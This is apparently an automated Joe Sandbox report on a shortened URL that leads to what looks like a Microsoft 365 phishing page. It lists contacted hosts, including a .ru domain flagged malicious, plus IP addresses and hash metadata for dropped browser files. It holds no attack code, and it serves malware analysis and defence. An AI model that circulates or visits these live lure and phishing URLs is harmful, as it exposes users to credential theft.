                                https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=truefalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                    high
                                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/90271690994917b5/1736956927204/056a419110721377e49177db5bf30d57c1fe1e6445ac46b00353113652a48a26/eWYiKqFvv6qKmlMfalse
                                        high
                                        https://mstn.qomitarnor.ru/JY1H/true
                                          unknown
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                            high
                                            https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/false
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90271690994917b5&lang=autofalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/2036730794:1736955028:x9_TEsImu3BSZM-HOgmsaGKzqEYCyP6QKi0CWNkTTWE/90271690994917b5/nwEvxiy9_h.VA75YrykS5NQcuBWoqQY0GFV3Y._y2mU-1736956925-1.1.1.1-xZxg4qxDwDzmvMHim.y5exA6yfk_UhVsjIKIwW2cQiQFWSNPrVfO6rAaAZtc0PAzfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/90271690994917b5/1736956927200/Z-kY-gEwytbJMddfalse
                                                      high
                                                      https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638725537372384998.MTUwMzgyYjAtZGZmNC00NjRlLTg0NmUtNmJjYTFkZjI3YTA2NzU3NzAwNDItYTU0OC00Y2JiLWEyNDEtYzhhOWZkYzE0YzJl&ui_locales=en-US&mkt=en-US&client-request-id=eb93d799-fa48-4843-bf42-41ba98be0e42&state=I_FTF0l0cKx0FpbVSlCGb4LXaCI4KaNepQ64ggZZM_kx9j5kqT9X-85aNddkOPYtqg80COYH7stNr3GsNw5_mtYmYUHmf0ouIDXAiVsJrYp80AcljcNaEWSaPXNZgrP5imTHDJensw-tqRmYxiqjJnXRaOsxd9CeKxqillBHjsTk6bSuPI9NRWMux3s939wPEJWbJrZKMMUaXwBt_KL7eyxow57fKRZjaySRPUcyBm9meUzvjsqKd4PrUDtpTlw72_bZiBUC5W61_6dA5nNENg&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0false
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://login.microsoftonline.comchromecache_81.1.dr, chromecache_90.1.drfalse
                                                          high
                                                          https://login.windows-ppe.netchromecache_81.1.dr, chromecache_90.1.drfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.21.48.1
                                                            1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ruUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.18.94.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            216.58.206.36
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            104.21.112.1
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.24.14
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            142.250.185.132
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.18.95.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.2.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            104.17.112.233
                                                            tinyurl.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            188.114.96.3
                                                            mstn.qomitarnor.ruEuropean Union
                                                            13335CLOUDFLARENETUStrue
                                                            104.17.25.14
                                                            cdnjs.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            IP
                                                            192.168.2.16
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1592026
                                                            Start date and time:2025-01-15 17:01:27 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 3m 40s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                            Sample URL:https://tinyurl.com/Amconconstruction
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:13
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal52.win@22/75@38/14
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.195, 172.217.18.14, 108.177.15.84, 142.250.185.174, 142.250.186.174, 40.126.32.134, 40.126.32.72, 40.126.32.76, 40.126.32.133, 20.190.160.22, 40.126.32.136, 40.126.32.140, 40.126.32.74, 13.107.6.156, 142.250.186.46, 142.250.186.78, 2.23.227.214, 2.23.227.223, 20.190.160.17, 20.190.160.20, 142.250.184.206, 40.126.32.68, 142.250.186.106, 142.250.185.106, 172.217.18.10, 172.217.16.138, 142.250.185.202, 142.250.184.234, 142.250.186.138, 216.58.206.42, 142.250.186.170, 142.250.185.234, 172.217.16.202, 142.250.181.234, 142.250.184.202, 216.58.206.74, 142.250.185.74, 142.250.185.138, 13.69.239.74, 172.217.16.206, 142.250.184.227, 172.217.18.110, 95.101.149.131, 95.101.54.121, 95.101.54.113, 142.250.185.142, 142.250.185.206, 216.58.206.78, 184.28.90.27, 4.175.87.197, 13.107.246.45, 13.107.246.44
                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdneu06.northeurope.cloudapp.azure.com, www.tm.aadcdn.msftauth.trafficmanager.net, www.tm.lg.prod.aadmsa.akadns.net, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, a1894.dscb.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, redirector.gvt1.com, login.live.com, update.googleapis.com, login.mso.msidentity.com, clients1.google.com, www.tm.ak.prd.aadg.trafficmanager.net, e329293.dscd.akamaiedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, b-0004.b-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, aadcdn.msftauth.edgekey.net, ww
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: https://tinyurl.com/Amconconstruction
                                                            No simulations
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 15:02:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2673
                                                            Entropy (8bit):3.9873069701042185
                                                            Encrypted:false
                                                            SSDEEP:48:8+dcTgYtHkWidAKZdA1FehwiZUklqehAy+3:8JvKE/y
                                                            MD5:70BDBA445939D9DA7E28F83F99BF05A2
                                                            SHA1:E8C378549C307EEDDB8FCD8097FCDB2F809BB19B
                                                            SHA-256:5D550D39B1436049BD615A1C872BE70CBC0E70B32BD482A5A3591FB491DF4460
                                                            SHA-512:4271A265F5E6B4261B7E8E637D4BF9008BAB965B37115DEC55B9B89D7003E2EB3C40BBEE0F438CBF682DD753823F6EF2623198B1EFF5B902CC823A2BC0949AE9
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....R.y.fg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z4.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/ZA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 15:02:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2675
                                                            Entropy (8bit):4.000450830283875
                                                            Encrypted:false
                                                            SSDEEP:48:8zdcTgYtHkWidAKZdA1seh/iZUkAQkqehvy+2:8KvK69Q+y
                                                            MD5:C1182E9D768373A40DE05C7E2C8C1E24
                                                            SHA1:52689E7F59BC56C3509CD15359E7B3CD76BF3D70
                                                            SHA-256:5A05A330F413A47A678DE38041E8CB93A4A8681136FDBE6CFEA2EA7E84A16E1A
                                                            SHA-512:F69400292252F482EDFF021622E2644ECB03C6FE0C39633A7709540DED745EEBE8A74489A181D54435481F1C4DA5E71DD3DE8F80D46D32CC57FBB147F9C4A05E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....0gm.fg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z4.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/ZA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2689
                                                            Entropy (8bit):4.015289620804348
                                                            Encrypted:false
                                                            SSDEEP:48:8pdcTgYAHkWidAKZdA14meh7sFiZUkmgqeh7sVy+BX:8AvNunLy
                                                            MD5:BF5809F8BE2D52AD3114564AB1554E21
                                                            SHA1:53185B49FF28A2CEC217719F3F8E7961B13FE0A1
                                                            SHA-256:6120594545C02F7C5C2D010B01A553C39E8D743D889F9AB7254D287C8AFF431A
                                                            SHA-512:A1F02DB6E66324B52E6BDBB140DD7D4A6476EB51D2DCC0D98AC6ACC516458B7E7A694AC9BC86C5D2280728B1C2BB4400C2C5F8D1A51BEB970CC403451D511F44
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z4.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 15:02:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):4.000464831227787
                                                            Encrypted:false
                                                            SSDEEP:48:88dcTgYtHkWidAKZdA1TehDiZUkwqehjy+R:83vKxty
                                                            MD5:A1F8191CAF04070DCA5CEADA914C96EE
                                                            SHA1:B729A1FEA4AD804DFC325FAEB55653CD0D397E70
                                                            SHA-256:4331CB0BC2BFC5B1A366B8E55F4F08E5961C5FF02EC33404FAF23372F3969447
                                                            SHA-512:FBFB0162DFF75CF05248713F4A1D1BCA68117B9B1920EA11625B114385B8671B46F66A246C2BD225C3C1F3FEAED98F02218AE1A2A6EDF3B0E391250F646F74EB
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,.....%g.fg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z4.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/ZA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 15:02:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2677
                                                            Entropy (8bit):3.99004681168346
                                                            Encrypted:false
                                                            SSDEEP:48:86dcTgYtHkWidAKZdA1dehBiZUk1W1qehBy+C:8dvKx9hy
                                                            MD5:943DC0D7CD6D340E06211854DBB1C5D0
                                                            SHA1:977431363A195F8C013036612EE16845E2E8CA05
                                                            SHA-256:4C7F763C55DC2E2B0401848A6146E85312D457B5B8BF6638FFC0ADD43829BFC3
                                                            SHA-512:095F501B2F2B5F20F87BDD03C4CDFAA2F897D7A3B3241E072A353026FF44523774B9E7A8DA842BA771204C0894CC13AC9F1D8FA71C10D22446DD5EAFAD8C86E6
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,....5.s.fg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z4.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/ZA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 15:02:01 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                            Category:dropped
                                                            Size (bytes):2679
                                                            Entropy (8bit):4.000257079563056
                                                            Encrypted:false
                                                            SSDEEP:48:8sdcTgYtHkWidAKZdA1duTeehOuTbbiZUk5OjqehOuTbLy+yT+:8HvKZTfTbxWOvTbLy7T
                                                            MD5:976D7D1E70AC457B0F80B2D099229B68
                                                            SHA1:2BA72DCA5D5B38FF31F24BAF5B6985704013F5FF
                                                            SHA-256:ADA1CFEAC5D310DA09335DC5AE4892DEB2DC5E6728414568F9394D7A439EE7C4
                                                            SHA-512:4E0847D9437522BF2B089316BF294F6CB7D3D16DE5EE377E655F98EAB07C90E00337B2EFC344DC723040854269AA2F62BF80F72ED1714A4F41B3AB5EC3405BF3
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:L..................F.@.. ...$+.,.....a].fg..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I/Z4.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Z@.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V/Z@.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V/Z@............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V/ZA............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):96
                                                            Entropy (8bit):5.218997042938778
                                                            Encrypted:false
                                                            SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWd6Nk:NciczBdTFsJFoM+q62Nk
                                                            MD5:9872BE83FA60DA999B65A3BD481731D3
                                                            SHA1:B59A8688C6A0D5311C6410A0D91537084E148F2D
                                                            SHA-256:5DEE42A8D755847C0813D4E5F033F51197B20DD3C6C2EE4FBE31FD27B2F593D3
                                                            SHA-512:53E947C87386ECF19E3B36E3F292A9757911F0F8B02FE36DDFC0DD74A3C784D97B15066AB4895EA694F66792A8C7CF525F59A03868FF5D5F0C3B5203D34C5F7D
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                            Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O348JyJcXRABGP////8P
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                            Category:dropped
                                                            Size (bytes):621
                                                            Entropy (8bit):7.673946009263606
                                                            Encrypted:false
                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:dropped
                                                            Size (bytes):3620
                                                            Entropy (8bit):6.867828878374734
                                                            Encrypted:false
                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                            Category:dropped
                                                            Size (bytes):35170
                                                            Entropy (8bit):7.993096534744333
                                                            Encrypted:true
                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                            Malicious:false
                                                            Reputation:low
